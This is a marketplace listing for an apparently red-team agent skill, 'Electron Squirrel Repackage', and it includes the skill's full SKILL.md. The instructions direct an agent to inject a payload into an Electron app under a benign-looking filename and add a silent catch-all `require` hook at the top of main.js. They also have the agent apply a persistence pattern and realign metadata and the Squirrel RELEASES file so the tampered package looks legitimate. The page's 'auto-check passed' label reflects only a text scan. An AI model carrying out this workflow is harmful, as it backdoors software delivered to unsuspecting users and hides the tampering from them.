What it does

Electron Squirrel Repackage is an agent skill from SpecterOps/skills. Repackage a newer Electron app into an older Squirrel-style delivery chain while injecting a main-process payload. Use when staging a benignly named payload, hooking main.js, normalizing metadata, and regenerating RELEASES.

Its SKILL.md is about 450 tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including assets (for example `agents/openai.yaml`).

It works with Electron. The repository describes itself as: A marketplace for LLM skills. The licence is Apache-2.0.

When your agent uses it

  • Staging a benignly named payload
  • Hooking main.js
  • Normalizing metadata
  • Regenerating RELEASES

Example prompts

  • “/electron-squirrel-repackage”

Workflow steps

7 steps, taken from the first numbered list in SKILL.md.

  1. Start from the newer Electron package, not an older app.asar build if the payload needs newer Electron/Node behavior.
  2. Work in the unpacked app directory (for example lib/net45/resources/app/).
  3. Copy the payload into the app directory under a benign application-like filename.
  4. Prepend the main-process hook early in main.js
  5. Reuse the install/persistence pattern from electron-install-persistence when the app must remain alive after install.
  6. Normalize metadata for the target delivery chain
  7. Repack the package and regenerate

What it can do on your machine

Read from SKILL.md and the folder at commit e655f93. It shows what the files ask for, not the result of running them.

  • Tool permissions

Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

From allowed-tools in the SKILL.md frontmatter.

  • Runs code

No scripts in the folder and no shell commands in SKILL.md (its code samples are javascript).

From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

From URLs in SKILL.md, links to its own repository left out.

  • Credentials

Names no API keys, tokens, secrets or passwords.

From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Electron Squirrel Repackage loads about 450 tokens when it runs. Until then it costs about 63 tokens; SKILL.md has 189 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~63
When it runs · the whole SKILL.md, loaded when a task matches
~450

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

Electron Squirrel Repackage

Use this skill when rebuilding a working Electron payload chain for a new payload file against a newer Electron runtime.

Inputs

  • path to the payload JS file
  • path to the newer Electron app package or .nupkg
  • output working directory
  • target delivery version/filename when an older chain must be preserved

Workflow

  1. Start from the newer Electron package, not an older app.asar build if the payload needs newer Electron/Node behavior.
  2. Work in the unpacked app directory (for example lib/net45/resources/app/).
  3. Copy the payload into the app directory under a benign application-like filename.
  4. Prepend the main-process hook early in main.js:
    js
    try { require('./<benign-name>.js') } catch (e) {}
  5. Reuse the install/persistence pattern from electron-install-persistence when the app must remain alive after install.
  6. Normalize metadata for the target delivery chain:
    • output filename
    • nuspec/app version fields
    • package metadata consistency
  7. Repack the package and regenerate:
    text
    <sha1> <filename> <size>

Output

Always report:

  • final package path
  • final RELEASES line
  • benign payload filename used
  • files modified
  • which persistence/install strategy was applied

Do Not

  • switch back to an older app.asar build when newer Electron is required
  • leave filename, metadata, and RELEASES out of sync
  • do ZIP/LNK delivery packaging unless explicitly requested
